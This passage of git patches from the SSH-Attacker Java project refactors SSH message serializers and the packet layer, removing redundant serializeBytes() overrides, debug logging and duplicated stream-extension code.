a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java @@ -30,10 +30,4 @@ private void serializeRecipientChannel() { public void serializeMessageSpecificContents() { serializeRecipientChannel(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java index 893dcbb1d..6fde8e889 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java @@ -53,10 +53,4 @@ public void serializeMessageSpecificContents() { serializeWindowSize(); serializePacketSize(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java index 34aada168..c092045e7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java @@ -19,10 +19,4 @@ public GlobalRequestFailureMessageSerializer(GlobalRequestFailureMessage message @Override public void serializeMessageSpecificContents() {} - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java index fd8cd519c..877afa0ad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java @@ -45,10 +45,4 @@ public void serializeMessageSpecificContents() { serializeRequestName(); serializeWantReply(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java index d5336d38b..70dee3bb4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java @@ -19,10 +19,4 @@ public GlobalRequestSuccessMessageSerializer(GlobalRequestSuccessMessage message @Override public void serializeMessageSpecificContents() {} - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java index f10bbfba7..5e419cbba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java @@ -48,10 +48,4 @@ protected void serializeProtocolMessageContents() { serializeText(); serializeEndOfMessageSequence(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java index ccc9e95b1..3f0a3cd30 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java @@ -54,10 +54,4 @@ public void serializeMessageSpecificContents() { serializeMessage(); serializeLanguageTag(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java index 3233a11e1..0bcd4901c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java @@ -51,10 +51,4 @@ public void serializeMessageSpecificContents() { serializeGroupModulus(); serializeGroupGenerator(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java index 2deb2fef3..f1278ae3d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java @@ -38,10 +38,4 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java index 182ba4e14..cd0ce9834 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java @@ -31,10 +31,4 @@ private void serializePreferredGroupSize() { public void serializeMessageSpecificContents() { serializePreferredGroupSize(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java index 181039ff0..15bc9e4a8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java @@ -59,9 +59,9 @@ public void serializeMessageSpecificContents() { serializeSignature(); } - @Override + /* @Override protected byte[] serializeBytes() { serializeProtocolMessageContents(); return getAlreadySerialized(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java index 0ae6185c0..cc2ad0e7a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java @@ -43,10 +43,4 @@ public void serializeMessageSpecificContents() { serializePreferredGroupSize(); serializeMaximalGroupSize(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java index 0f56e6573..a2df8f7db 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java @@ -38,10 +38,4 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java index fbe4d18ba..e6f7d7708 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java @@ -58,10 +58,4 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); serializeSignature(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java index fc3e80fc8..4bc2f81ce 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java @@ -57,10 +57,4 @@ public void serializeMessageSpecificContents() { serializeDescription(); serializeLanguageTag(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java index f37d5389d..93d965187 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java @@ -41,10 +41,4 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java index 27564084c..a2882a082 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java @@ -56,10 +56,4 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(message); serializeSignature(message); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java index 887c398aa..10dee8afe 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java @@ -59,10 +59,4 @@ public void serializeMessageSpecificContents() { LOGGER.debug("HybridKeyLength: " + length); LOGGER.debug("HybridKeyBytes: " + ArrayConverter.bytesToHexString(keys)); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java index dee75e7e6..8ba3e6cdf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java @@ -83,11 +83,4 @@ private void serializeSignature() { appendBytes(message.getSignature().getValue()); LOGGER.debug("Signature: " + message.getSignature()); } - - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java index 82e06eacc..769eece7b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java @@ -33,10 +33,4 @@ private void serializeData() { public void serializeMessageSpecificContents() { serializeData(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java index c6474ca83..4f4139359 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java @@ -198,11 +198,4 @@ public void serializeMessageSpecificContents() { serializeFirstKeyExchangePacketFollows(); serializeReserved(); } - - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java index 604541da5..c73da6fa9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java @@ -18,11 +18,4 @@ public NewKeysMessageSerializer(NewKeysMessage message) { @Override public void serializeMessageSpecificContents() {} - - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java index 8becc68c9..35662d2aa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java @@ -33,10 +33,4 @@ private void serializeSignature() { public void serializeMessageSpecificContents() { serializeSignature(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java index 5a24cc1cd..cb362e640 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java @@ -44,10 +44,4 @@ public void serializeMessageSpecificContents() { serializeHostKeyBytes(); serializeTransientPublicKey(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java index 550468da9..6b80f7ee4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java @@ -37,10 +37,4 @@ private void serializeEncryptedSecret() { public void serializeMessageSpecificContents() { serializeEncryptedSecret(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java index ac97f6fa2..69be58bb5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java @@ -36,11 +36,4 @@ private void serializeServiceName() { public void serializeMessageSpecificContents() { serializeServiceName(); } - - @Override - protected byte[] serializeBytes() { - // serializeMessageSpecificContents(); - super.serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java index dc42e5c3f..0be387f55 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java @@ -36,10 +36,4 @@ private void serializeServiceName() { public void serializeMessageSpecificContents() { serializeServiceName(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java index f57b8d1a9..662c24cca 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java @@ -25,10 +25,4 @@ private void serializeSequenceNumber() { public void serializeMessageSpecificContents() { serializeSequenceNumber(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java index 33b84defe..ce7185fa1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java @@ -26,10 +26,4 @@ public void serializeMessageSpecificContents() { LOGGER.debug("Payload: " + ArrayConverter.bytesToHexString(message.getPayload())); appendBytes(message.getPayload().getValue()); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java index fe7047b28..10b81542e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java @@ -60,10 +60,4 @@ protected void serializeProtocolMessageContents() { serializeComment(); serializeEndOfMessageSequence(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } From 490419db80a2649eb17092c6f967441a030131d9 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 13 Aug 2023 14:43:48 +0200 Subject: [PATCH 060/176] Remove unnecessary stream-extending --- .../core/layer/impl/PacketLayer.java | 38 +++---------------- 1 file changed, 6 insertions(+), 32 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index bd6dc55f0..b8152a901 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -42,7 +42,6 @@ import java.io.IOException; import java.io.InputStream; import java.nio.charset.StandardCharsets; -import java.util.Arrays; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -195,7 +194,10 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException addProducedContainer(packet); PacketLayerHint currentHint; - // currentHint = new PacketLayerHint(packet.getContentMessageType()); + /* currentHint = + new PacketLayerHint( + MessageIdConstant.fromId( + packet.getPayload().getValue()[0], context.getContext()));*/ currentHint = parseMessageId(packet, context); LOGGER.debug("[bro] got hint: " + currentHint.getType()); @@ -207,21 +209,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } else { currentInputStream.setHint(currentHint); } - // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - // if only one byte is to transmit - transmit it alone - if (packet.getPayload().getValue().length == 1) { - currentInputStream.extendStream( - Arrays.copyOfRange( - packet.getPayload().getValue(), - 0, - packet.getPayload().getValue().length)); - } else { - currentInputStream.extendStream( - Arrays.copyOfRange( - packet.getPayload().getValue(), - 0, - packet.getPayload().getValue().length)); - } + currentInputStream.extendStream(packet.getPayload().getValue()); } else { @@ -231,21 +219,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } else { nextInputStream.setHint(currentHint); } - // nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - if (packet.getPayload().getValue().length == 1) { - nextInputStream.extendStream( - Arrays.copyOfRange( - packet.getPayload().getValue(), - 0, - packet.getPayload().getValue().length)); - } else { - nextInputStream.extendStream( - Arrays.copyOfRange( - packet.getPayload().getValue(), - 0, - packet.getPayload().getValue().length)); - } - throw new RuntimeException(); + nextInputStream.extendStream(packet.getPayload().getValue()); } } From 0fb5982320e64026a8beca134497d9173371a085 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 13 Aug 2023 20:59:26 +0200 Subject: [PATCH 061/176] Move Packet-Type-Interpretation up to SSHV2-layer and did some Cleanup --- .../sshattacker/core/layer/ProtocolLayer.java | 1 - .../core/layer/impl/PacketLayer.java | 280 +------ .../core/layer/impl/SSH2Layer.java | 778 ++++++++++++++---- .../packet/parser/BinaryPacketParser.java | 2 + 4 files changed, 642 insertions(+), 419 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 80a369cd8..7b3f71795 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -258,7 +258,6 @@ protected void readDataContainer(ContainerT container, LayerContext context) { protected void readContainerFromStream( ContainerT container, LayerContext context, HintedInputStream inputStream) { Parser parser = container.getParser(context, inputStream); - try { parser.parse(container); Handler handler = container.getHandler(context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index b8152a901..2591053b0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -36,12 +36,9 @@ import de.rub.nds.sshattacker.core.packet.parser.AbstractPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParser; import de.rub.nds.sshattacker.core.packet.parser.BlobPacketParser; -import de.rub.nds.sshattacker.core.protocol.transport.message.AsciiMessage; import de.rub.nds.sshattacker.core.protocol.transport.parser.*; -import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; -import java.nio.charset.StandardCharsets; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -58,9 +55,6 @@ public class PacketLayer extends ProtocolLayer private final PacketCompressor compressor; private final PacketDecompressor decompressor; - private int writeEpoch = 0; - private int readEpoch = 0; - public PacketLayer(SshContext context) { super(ImplementedLayers.PACKET_LAYER); this.context = context; @@ -107,10 +101,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { public LayerProcessingResult sendData( PacketLayerHint hint, byte[] additionalData) throws IOException { - LOGGER.debug( - "[bro] sending hint {} with data {}", - hint.getType(), - ArrayConverter.bytesToHexString(additionalData)); MessageIdConstant type = MessageIdConstant.UNKNOWN; if (hint != null) { type = hint.getType(); @@ -121,23 +111,16 @@ public LayerProcessingResult sendData( AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BLOB) { - LOGGER.debug("[bro] Created a BLOB Packet"); packet = new BlobPacket(); } else { - LOGGER.debug("[bro] Created a Binary Packet"); packet = new BinaryPacket(); } packet.setPayload(additionalData); - LOGGER.debug("[bro] Set Packetpayload"); Preparator preparator = packet.getPreparator(context); - LOGGER.debug("[bro] Got Preperator"); preparator.prepare(); - LOGGER.debug("[bro] Prepared Packetpayload"); Serializer serializer = packet.getSerializer(context); - LOGGER.debug("[bro] got Serializier"); byte[] serializedMessage = serializer.serialize(); - LOGGER.debug("[bro] Serializied Payload"); List packets = new LinkedList<>(); packets.add(packet); @@ -189,266 +172,15 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); - packet.setPayload(packet.getPayload()); - addProducedContainer(packet); - PacketLayerHint currentHint; - - /* currentHint = - new PacketLayerHint( - MessageIdConstant.fromId( - packet.getPayload().getValue()[0], context.getContext()));*/ - currentHint = parseMessageId(packet, context); - - LOGGER.debug("[bro] got hint: " + currentHint.getType()); - - if (desiredHint == null || currentHint.equals(desiredHint)) { - if (currentInputStream == null) { - // only set new input stream if necessary, extend current stream otherwise - currentInputStream = new HintedLayerInputStream(currentHint, this); - } else { - currentInputStream.setHint(currentHint); - } - currentInputStream.extendStream(packet.getPayload().getValue()); + if (currentInputStream == null) { + // only set new input stream if necessary, extend current stream otherwise + currentInputStream = new HintedLayerInputStream(null, this); } else { - - if (nextInputStream == null) { - // only set new input stream if necessary, extend current stream otherwise - nextInputStream = new HintedLayerInputStream(currentHint, this); - } else { - nextInputStream.setHint(currentHint); - } - nextInputStream.extendStream(packet.getPayload().getValue()); - } - } - - public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) { - byte[] 